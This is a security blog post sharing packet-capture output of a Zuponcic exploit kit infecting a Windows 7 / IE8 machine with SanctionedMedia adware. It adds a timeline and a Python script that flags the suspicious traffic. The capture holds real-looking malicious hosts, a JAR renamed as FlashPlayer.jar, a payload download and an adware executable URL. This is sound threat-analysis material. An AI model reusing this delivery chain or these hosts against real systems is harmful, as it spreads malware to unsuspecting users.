RARE Zuponcic Exploit Kit Traffic Sample Delivers Adware:SanctionedMedia PCAP Download

By | January 29, 2016

Download this rare PCAP: zuponcic


Adware:MSIL/SanctionedMedia is the detection name that Microsoft Security Essentials, Windows Defender and other antivirus products use for a potentially unwanted program (PUP). A potentially unwanted application is a program that carries adware, installs toolbars or has other unclear objectives.

Adware:MSIL/SanctionedMedia is technically not a virus, but it exhibits plenty of malicious traits: rootkit-style hooks deep into the operating system, browser hijacking and, in general, interference with the user experience. The industry refers to such software as a "PUP", or potentially unwanted program. The infection exists to boost advertising revenue, for example through blackhat SEO that inflates a site's page ranking in search results.

What the capture shows, in order (every host, URI and header below is taken from the dump):

1. 22:05:05 - The victim, on Internet Explorer 8, arrives from a Bing search at http://www.silvergrey.es/. The site answers 302, drops an xpH cookie, and points the browser at an OpenX-style ad-server URL, /delivery/lg.php on ambalanchery.drdekloet.com.
2. 22:05:06 - lg.php answers 302 to http://ga.instylecuts.net/ (178.33.192.35, nginx/1.5.8), the exploit kit landing host.
3. 22:05:07 - ga.instylecuts.net serves a 2988-byte landing page, sets a PHPSESSID cookie, and the browser fetches /js/java.js (16795 bytes) and a 43-byte /tr.gif; /favicon.ico is bounced to www.google.com.
4. 22:05:18 - Ten seconds later a different User-Agent, Java/1.6.0_25 (Java 6 Update 25, an outdated runtime), fetches /SnaorNJ.jar carrying the browser's PHPSESSID cookie. The 5626-byte archive is served with Content-Disposition filename="FlashPlayer.jar", a name that does not match the URI.
5. 22:05:24 - The same Java User-Agent POSTs a 94-byte form body (i=<base64>) to / and receives a 1,270,448-byte application/octet-stream named "rnosqj": the dropped payload.
6. 22:05:34 - A process with an MSIE 7.0 User-Agent (the victim's browser identifies as MSIE 8.0) requests /redir/article/home directly from 93.115.88.220 and gets a 404 from Apache/1.3.42.
7. 22:05:41 - A User-Agent of "Mozilla/4.0 (compatible; SMAD 9.9.9.9; )" fetches www.sanctionedmedia.com/version2.XML, which points at http://www.SanctionedMedia.com/prot54.exe, then POSTs the browser build, the Windows edition, the exploit kit URL and the window title to /smfeed2.php. The server answers "nothing to pop".

The mismatch between the URI and the Content-Disposition filename on the JAR, the Java User-Agent receiving a large octet-stream, and the SMAD User-Agent are the indicators a practitioner would alert on; the raw tcpdump output follows.

2014-03-16 22:05:05.594513 IP 192.168.204.188.49281 > 217.76.156.117.80: Flags [P.], seq 1:574, ack 1, win 64240, length 573: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://www.bing.com/search?q=www.silvergrey.es%2F&qs=n&form=QBLH&pq=www.silvergrey.es%2F&sc=0-0&sp=-1&sk=&cvid=538afc1b16b24ba791270c30b296cdd8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.silvergrey.es
Connection: Keep-Alive

2014-03-16 22:05:05.594574 IP 217.76.156.117.80 > 192.168.204.188.49281: Flags [.], ack 574, win 64240, length 0
2014-03-16 22:05:05.772439 IP 217.76.156.117.80 > 192.168.204.188.49281: Flags [FP.], seq 1:939, ack 574, win 64240, length 938: HTTP: HTTP/1.1 302 Found
HTTP/1.1 302 Found
Date: Mon, 17 Mar 2014 03:05:05 GMT
Server: Apache
Set-Cookie: xpH=05; path=/; domain=www.silvergrey.es; expires=Mon, 24-Mar-2014 15:18:05 GMT
Location: http://ambalanchery.drdekloet.com/delivery/lg.php?bannerid=23350&campaignid=4402&zoneid=272&channel_ids=,&loc=http%3A%2F%2Fwww.silvergrey.es%2F&referer=http%3A%2F%2Fwww.silvergrey.es%2F&cb=bcaeb92e71
Content-Length: 474
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ambalanchery.drdekloet.com/delivery/lg.php?bannerid=23350&amp;campaignid=4402&amp;zoneid=272&amp;channel_ids=,&amp;loc=http%3A%2F%2Fwww.silvergrey.es%2F&amp;referer=http%3A%2F%2Fwww.silvergrey.es%2F&amp;cb=bcaeb92e71">here</a>.</p>
<hr>
<address>Apache Server at www.silvergrey.es Port 80</address>
</body></html>

2014-03-16 22:05:06.114625 IP 192.168.204.188.49282 > 31.210.96.157.80: Flags [P.], seq 1:748, ack 1, win 64240, length 747: HTTP: GET /delivery/lg.php?bannerid=23350&campaignid=4402&zoneid=272&channel_ids=,&loc=http%3A%2F%2Fwww.silvergrey.es%2F&referer=http%3A%2F%2Fwww.silvergrey.es%2F&cb=bcaeb92e71 HTTP/1.1
GET /delivery/lg.php?bannerid=23350&campaignid=4402&zoneid=272&channel_ids=,&loc=http%3A%2F%2Fwww.silvergrey.es%2F&referer=http%3A%2F%2Fwww.silvergrey.es%2F&cb=bcaeb92e71 HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://www.bing.com/search?q=www.silvergrey.es%2F&qs=n&form=QBLH&pq=www.silvergrey.es%2F&sc=0-0&sp=-1&sk=&cvid=538afc1b16b24ba791270c30b296cdd8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: ambalanchery.drdekloet.com

2014-03-16 22:05:06.114630 IP 31.210.96.157.80 > 192.168.204.188.49282: Flags [.], ack 748, win 64240, length 0
2014-03-16 22:05:06.743853 IP 31.210.96.157.80 > 192.168.204.188.49282: Flags [P.], seq 1:356, ack 748, win 64240, length 355: HTTP: HTTP/1.1 302 Moved Temporarily
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.1.4
Date: Mon, 17 Mar 2014 03:05:06 GMT
Content-Type: text/html
Content-Length: 160
Connection: close
Location: http://ga.instylecuts.net/

<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx/1.1.4</center>
</body>

2014-03-16 22:05:07.010773 IP 192.168.204.188.49283 > 178.33.192.35.80: Flags [P.], seq 1:575, ack 1, win 64240, length 574: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://www.bing.com/search?q=www.silvergrey.es%2F&qs=n&form=QBLH&pq=www.silvergrey.es%2F&sc=0-0&sp=-1&sk=&cvid=538afc1b16b24ba791270c30b296cdd8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: ga.instylecuts.net

2014-03-16 22:05:07.010805 IP 178.33.192.35.80 > 192.168.204.188.49283: Flags [.], ack 575, win 64240, length 0
2014-03-16 22:05:07.212855 IP 178.33.192.35.80 > 192.168.204.188.49283: Flags [P.], seq 1:1461, ack 575, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.5.8
Date: Mon, 17 Mar 2014 03:05:07 GMT
Content-Type: text/html
Content-Length: 2988
Connection: close
Set-Cookie: PHPSESSID=v5cmlvmcemc82chntmg6edfah3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

2014-03-16 22:05:07.373801 IP 192.168.204.188.49285 > 178.33.192.35.80: Flags [P.], seq 1:403, ack 1, win 64240, length 402: HTTP: GET /js/java.js HTTP/1.1
GET /js/java.js HTTP/1.1
Accept: */*
Referer: http://ga.instylecuts.net/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: ga.instylecuts.net
Connection: Keep-Alive
Cookie: PHPSESSID=v5cmlvmcemc82chntmg6edfah3

2014-03-16 22:05:07.373940 IP 178.33.192.35.80 > 192.168.204.188.49285: Flags [.], ack 403, win 64240, length 0
2014-03-16 22:05:07.459015 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
2014-03-16 22:05:07.515638 IP 178.33.192.35.80 > 192.168.204.188.49285: Flags [P.], seq 1:299, ack 403, win 64240, length 298: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.5.8
Date: Mon, 17 Mar 2014 03:05:07 GMT
Content-Type: application/javascript
Content-Length: 16795
Last-Modified: Thu, 12 May 2011 16:14:28 GMT
Connection: close
ETag: "4dcc0764-419b"
Expires: Wed, 16 Apr 2014 03:05:07 GMT
Cache-Control: max-age=2592000

2014-03-16 22:05:07.836923 IP 192.168.204.188.49286 > 178.33.192.35.80: Flags [P.], seq 1:399, ack 1, win 64240, length 398: HTTP: GET /tr.gif HTTP/1.1
GET /tr.gif HTTP/1.1
Accept: */*
Referer: http://ga.instylecuts.net/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: ga.instylecuts.net
Connection: Keep-Alive
Cookie: PHPSESSID=v5cmlvmcemc82chntmg6edfah3

2014-03-16 22:05:07.836927 IP 178.33.192.35.80 > 192.168.204.188.49286: Flags [.], ack 399, win 64240, length 0
2014-03-16 22:05:07.858983 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
2014-03-16 22:05:07.959033 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
2014-03-16 22:05:07.972818 IP 178.33.192.35.80 > 192.168.204.188.49286: Flags [P.], seq 1:281, ack 399, win 64240, length 280: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.5.8
Date: Mon, 17 Mar 2014 03:05:08 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Sat, 24 Sep 2011 20:51:54 GMT
Connection: close
ETag: "4e7e42ea-2b"
Expires: Wed, 16 Apr 2014 03:05:08 GMT
Cache-Control: max-age=2592000


2014-03-16 22:05:08.137718 IP 192.168.204.188.49287 > 178.33.192.35.80: Flags [P.], seq 1:343, ack 1, win 64240, length 342: HTTP: GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ga.instylecuts.net
Connection: Keep-Alive
Cookie: PHPSESSID=v5cmlvmcemc82chntmg6edfah3

2014-03-16 22:05:08.137750 IP 178.33.192.35.80 > 192.168.204.188.49287: Flags [.], ack 343, win 64240, length 0
2014-03-16 22:05:08.158908 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
2014-03-16 22:05:08.258923 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
2014-03-16 22:05:08.268114 IP 178.33.192.35.80 > 192.168.204.188.49287: Flags [FP.], seq 1:352, ack 343, win 64240, length 351: HTTP: HTTP/1.1 302 Moved Temporarily
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.5.8
Date: Mon, 17 Mar 2014 03:05:08 GMT
Content-Type: text/html
Content-Length: 160
Connection: close
Location: http://www.google.com/

<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx/1.5.8</center>
</body>
</html>

2014-03-16 22:05:18.569718 IP 192.168.204.188.49289 > 178.33.192.35.80: Flags [P.], seq 1:322, ack 1, win 64240, length 321: HTTP: GET /SnaorNJ.jar HTTP/1.1
GET /SnaorNJ.jar HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_25
Host: ga.instylecuts.net
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Cookie: PHPSESSID=v5cmlvmcemc82chntmg6edfah3

2014-03-16 22:05:18.569874 IP 178.33.192.35.80 > 192.168.204.188.49289: Flags [.], ack 322, win 64240, length 0
2014-03-16 22:05:18.667151 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
2014-03-16 22:05:18.743966 IP 178.33.192.35.80 > 192.168.204.188.49289: Flags [P.], seq 1:392, ack 322, win 64240, length 391: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.5.8
Date: Mon, 17 Mar 2014 03:05:18 GMT
Content-Type: application/java-archive
Content-Length: 5626
Last-Modified: Mon, 17 Mar 2014 02:02:12 GMT
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: post-check=0, pre-check=0
Accept-Ranges: none
Content-Disposition: attachment; filename="FlashPlayer.jar"
ETag: "532657a4-15fa"

2014-03-16 22:05:24.990170 IP 192.168.204.188.49290 > 178.33.192.35.80: Flags [P.], seq 1:302, ack 1, win 64240, length 301: HTTP: POST / HTTP/1.1
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_25
Host: ga.instylecuts.net
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 94
Cookie: PHPSESSID=v5cmlvmcemc82chntmg6edfah3

2014-03-16 22:05:24.990331 IP 178.33.192.35.80 > 192.168.204.188.49290: Flags [.], ack 302, win 64240, length 0
2014-03-16 22:05:24.990535 IP 192.168.204.188.49290 > 178.33.192.35.80: Flags [P.], seq 302:396, ack 1, win 64240, length 94: HTTP
i=2ZIgfqzM5aq0q42DyFMy+pi1pw8EAnVgH1SZB+JYLAbQImahf0miQkAsFa3R1QE78IJH3yVQJY/73V2tfkvF1MFMaKQ=

2014-03-16 22:05:24.990591 IP 178.33.192.35.80 > 192.168.204.188.49290: Flags [.], ack 396, win 64240, length 0
2014-03-16 22:05:25.068400 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
2014-03-16 22:05:25.168479 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
2014-03-16 22:05:25.268356 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
2014-03-16 22:05:25.324410 IP 178.33.192.35.80 > 192.168.204.188.49290: Flags [P.], seq 1:1461, ack 396, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.5.8
Date: Mon, 17 Mar 2014 03:05:25 GMT
Content-Type: application/octet-stream
Content-Length: 1270448
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: post-check=0, pre-check=0
Accept-Ranges: none
Content-Disposition: attachment; filename="rnosqj"
Last-Modified: Mon, 17 Mar 2014 03:05:25 GMT
ETag: W/"160a10-1362b0-4f4c4b0dec740"
Accept-Ranges: bytes

2014-03-16 22:05:34.521812 IP 192.168.204.188.49291 > 93.115.88.220.80: Flags [P.], seq 1:953, ack 1, win 64240, length 952: HTTP: GET /redir/article/home HTTP/1.1
GET /redir/article/home HTTP/1.1
Cache-Control: no-cache
Connection: Close
Pragma: no-cache
Accept: */*
Cookie: articles-visitor=ft-WpE0bemg9f47XnQR0iKHr1w_ZSuiDJU2YcCpqrH7FygLYKESPhrz4j7Gvx1HFgMwoBx7S2Ww7bH_WKDsmpIbErxGzJOJzmkYPPQFXp52o5tJ_j_iL8kxThQFo0xWNRBNHBQLhl_F7qkVJR3oPKdxtwdTYzyiZc8OYyHy7SDybUMigS2TZOeQ5AzQ_iPqWuVaEcmvurIgOeZLN11B-weBb5bRjeLZ0A4ZR2AUvHe-qN4qCd5M3sftXHaA9bN4F3lPWmtEafTXgkRGku6TOwdB8kgFMYwgVFsYG0hNAkIyIN6KCeBdZOMFhfSnJRmjGpKP01aGJJloQyahKE_M44KydHs11AogBqibckht8paOZEfLd91zjOFtX48CIpIRXJNrMgF9eIZMWOIT9_x7BjJXOjObOsJtQES2eQvL2bSaeNHihBU0CQGDo4GUN528EAsj5a7AMBczEeZ10-iDZgAks6D-6jIOw95-mXhpe0zvG2ir6yBkAiW4YDr1dccsT7ktGy-mt_GzUd5ICzC7U2qyxYv7dGH7u_vENxgNDYZLHxHnl7LjEbH1; m-b=tz=ep2zatqWQv-QwRM45Y167oU1cEAbKW6hlZFsqgR1m3waK
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 93.115.88.220

2014-03-16 22:05:34.521857 IP 93.115.88.220.80 > 192.168.204.188.49291: Flags [.], ack 953, win 64240, length 0
2014-03-16 22:05:34.567093 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
2014-03-16 22:05:34.667130 IP 178.33.192.35.80 > 192.168.204.188.49284: Flags [S.], seq 1083900186, ack 987510888, win 64240, options [mss 1460], length 0
2014-03-16 22:05:34.761558 IP 93.115.88.220.80 > 192.168.204.188.49291: Flags [FP.], seq 1:388, ack 953, win 64240, length 387: HTTP: HTTP/1.1 404 Not Found
HTTP/1.1 404 Not Found
Server: Apache/1.3.42
Date: Mon, 17 Mar 2014 03:05:35 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 216
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /redir/article/home was not found on this server.</p>
</body></html>

2014-03-16 22:05:41.082418 IP 192.168.204.188.49293 > 66.254.123.33.80: Flags [P.], seq 1:141, ack 1, win 64240, length 140: HTTP: GET /version2.XML HTTP/1.1
GET /version2.XML HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; SMAD 9.9.9.9; )
Host: www.sanctionedmedia.com
Connection: Keep-Alive

2014-03-16 22:05:41.082499 IP 66.254.123.33.80 > 192.168.204.188.49293: Flags [.], ack 141, win 64240, length 0
2014-03-16 22:05:41.163656 IP 66.254.123.33.80 > 192.168.204.188.49293: Flags [P.], seq 1:396, ack 141, win 64240, length 395: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.0.14
Date: Mon, 17 Mar 2014 03:05:41 GMT
Content-Type: application/xml
Connection: keep-alive
Last-Modified: Tue, 24 Jan 2012 05:04:40 GMT
ETag: "2415ba-8c-4b73f1598ca00"
Accept-Ranges: bytes
Content-Length: 140

<?xml version="1.0" encoding="utf-8"?>
<Smad>
<version>1.0.0.0</version>
<url>http://www.SanctionedMedia.com/prot54.exe</url>
</Smad>

2014-03-16 22:05:41.263430 IP 66.254.123.33.80 > 192.168.204.188.49293: Flags [P.], seq 1:396, ack 141, win 64240, length 395: HTTP: HTTP/1.1 200 OK
(retransmission of the segment above; headers and body identical)

2014-03-16 22:05:46.513639 IP 192.168.204.188.49293 > 66.254.123.33.80: Flags [P.], seq 141:349, ack 396, win 63845, length 208: HTTP: POST /smfeed2.php HTTP/1.1
POST /smfeed2.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; SMAD 9.9.9.9; )
Host: www.sanctionedmedia.com
Content-Length: 197
Expect: 100-continue

2014-03-16 22:05:46.513659 IP 66.254.123.33.80 > 192.168.204.188.49293: Flags [.], ack 349, win 64240, length 0
2014-03-16 22:05:46.591443 IP 66.254.123.33.80 > 192.168.204.188.49293: Flags [P.], seq 396:421, ack 349, win 64240, length 25: HTTP: HTTP/1.1 100 Continue
HTTP/1.1 100 Continue

2014-03-16 22:05:46.591829 IP 192.168.204.188.49293 > 66.254.123.33.80: Flags [P.], seq 349:546, ack 421, win 63820, length 197: HTTP
uid=&pid=&ver=5.0.0.0&ua=Internet+Explorer+8.00.7600.16385&os=Windows+7+Home+Premium+Service+Pack+1+64-bit&url=http%3a%2f%2fga.instylecuts.net%2f&title=www.silvergrey.es+-+Windows+Internet+Explorer

2014-03-16 22:05:46.591899 IP 66.254.123.33.80 > 192.168.204.188.49293: Flags [.], ack 546, win 64240, length 0
2014-03-16 22:05:46.669833 IP 66.254.123.33.80 > 192.168.204.188.49293: Flags [P.], seq 421:631, ack 546, win 64240, length 210: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.0.14
Date: Mon, 17 Mar 2014 03:05:46 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 14

nothing to pop

2014-03-16 22:05:46.769726 IP 66.254.123.33.80 > 192.168.204.188.49293: Flags [P.], seq 421:631, ack 546, win 64240, length 210: HTTP: HTTP/1.1 200 OK
(retransmission of the segment above; headers and body identical)
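The chain in this dump is the kind of thing you want pulled out of a capture automatically rather than by reading tcpdump output. The Python below is an added example, not code from the original post: it runs over a hand-built summary of the request/response pairs above (hosts, URIs, User-Agents, status codes, sizes, headers and bodies copied from the dump; long query strings shortened; browser User-Agents cut after Trident/4.0) and flags the four things worth alerting on: the 302 chain that was actually followed, User-Agents that are not the victim's browser, a JAR whose Content-Disposition filename does not match its URI, and a large octet-stream handed to the Java runtime. It also decodes the SanctionedMedia check-in. The record layout, the function names and the 100 KB payload threshold are assumptions of this script.

```python
"""Triage the HTTP transactions in the Zuponcic / SanctionedMedia capture.
Added example, not code from the original post. TRANSACTIONS is a hand-built
summary of the dump (values copied from it, query strings shortened, browser
User-Agents cut after Trident/4.0); layout, names and thresholds are assumptions.
"""
import re
import xml.etree.ElementTree as ET
from collections import Counter
from dataclasses import dataclass
from urllib.parse import parse_qs, urlparse

IE8 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
IE7 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0)"
JAVA = "Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_25"
SMAD = "Mozilla/4.0 (compatible; SMAD 9.9.9.9; )"

@dataclass
class Tx:
    method: str
    host: str
    uri: str
    ua: str
    status: int
    ctype: str = ""        # response Content-Type
    clen: int = 0          # response Content-Length
    location: str = ""     # response Location (redirects)
    disposition: str = ""  # response Content-Disposition
    body: str = ""         # POST body, or response body where it matters

TRANSACTIONS = [  # constructed from the dump, in capture order
    Tx("GET", "www.silvergrey.es", "/", IE8, 302, "text/html", 474,
       location="http://ambalanchery.drdekloet.com/delivery/lg.php?bannerid=23350&zoneid=272"),
    Tx("GET", "ambalanchery.drdekloet.com", "/delivery/lg.php?bannerid=23350&zoneid=272",
       IE8, 302, "text/html", 160, location="http://ga.instylecuts.net/"),
    Tx("GET", "ga.instylecuts.net", "/", IE8, 200, "text/html", 2988),
    Tx("GET", "ga.instylecuts.net", "/js/java.js", IE8, 200, "application/javascript", 16795),
    Tx("GET", "ga.instylecuts.net", "/favicon.ico", IE8, 302, "text/html", 160,
       location="http://www.google.com/"),
    Tx("GET", "ga.instylecuts.net", "/SnaorNJ.jar", JAVA, 200, "application/java-archive", 5626,
       disposition='attachment; filename="FlashPlayer.jar"'),
    Tx("POST", "ga.instylecuts.net", "/", JAVA, 200, "application/octet-stream", 1270448,
       disposition='attachment; filename="rnosqj"'),
    Tx("GET", "93.115.88.220", "/redir/article/home", IE7, 404, "text/html", 216),
    Tx("GET", "www.sanctionedmedia.com", "/version2.XML", SMAD, 200, "application/xml", 140,
       body='<?xml version="1.0" encoding="utf-8"?>\n<Smad>\n<version>1.0.0.0</version>\n'
            '<url>http://www.SanctionedMedia.com/prot54.exe</url>\n</Smad>'),
    Tx("POST", "www.sanctionedmedia.com", "/smfeed2.php", SMAD, 200, "text/html", 14,
       body="uid=&pid=&ver=5.0.0.0&ua=Internet+Explorer+8.00.7600.16385"
            "&os=Windows+7+Home+Premium+Service+Pack+1+64-bit"
            "&url=http%3a%2f%2fga.instylecuts.net%2f&title=www.silvergrey.es+-+Windows+Internet+Explorer"),
]

def redirect_chain(txs):
    """Hosts the browser was bounced through. A 302 counts only when a later request
    lands on its Location target, so the unfollowed favicon bounce to google.com is skipped."""
    chain = []
    for i, t in enumerate(txs):
        if t.status != 302 or not t.location:
            continue
        target = urlparse(t.location)
        for nxt in txs[i + 1:]:
            if nxt.host == target.hostname and nxt.uri.split("?")[0] == (target.path or "/"):
                if not chain:
                    chain.append(t.host)
                chain.append(nxt.host)
                break
    return chain

def secondary_agents(txs):
    """Every User-Agent except the most frequent one: not the victim's browser."""
    primary = Counter(t.ua for t in txs).most_common(1)[0][0]
    return sorted({t.ua for t in txs if t.ua != primary})

def renamed_archives(txs):
    """Java downloads whose Content-Disposition filename differs from the URI filename."""
    hits = []
    for t in txs:
        m = re.search(r'filename="?([^";]+)', t.disposition)
        if "Java/" in t.ua and "java-archive" in t.ctype and m and m.group(1) != t.uri.rsplit("/", 1)[-1]:
            hits.append((t.uri, m.group(1)))
    return hits

def payload_downloads(txs, min_bytes=100_000):
    """Large octet-stream bodies handed to the Java runtime: the dropped binary."""
    return [(t.host, t.method, t.uri, t.clen) for t in txs
            if "Java/" in t.ua and "octet-stream" in t.ctype and t.clen >= min_bytes]

def pup_checkin(txs):
    """Update URL from the SanctionedMedia XML manifest plus the decoded fields of its POST."""
    url, fields = None, {}
    for t in txs:
        if "SMAD" not in t.ua or not t.body:
            continue
        if "xml" in t.ctype:
            url = ET.fromstring(t.body.encode()).findtext("url")
        elif t.method == "POST":
            fields = {k: v[0] for k, v in parse_qs(t.body, keep_blank_values=True).items()}
    return url, fields

if __name__ == "__main__":
    for check in (redirect_chain, secondary_agents, renamed_archives, payload_downloads, pup_checkin):
        print(f"{check.__name__}: {check(TRANSACTIONS)}")
```

The redirect check deliberately requires the Location target to be requested afterwards; a bare 302 to google.com is noise, a 302 whose target the client then fetches from a host it has never spoken to is a hop. The same checks apply to a real capture once the transactions are extracted (for example with tshark -Y http -T fields); nothing in the detection logic depends on this sample.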
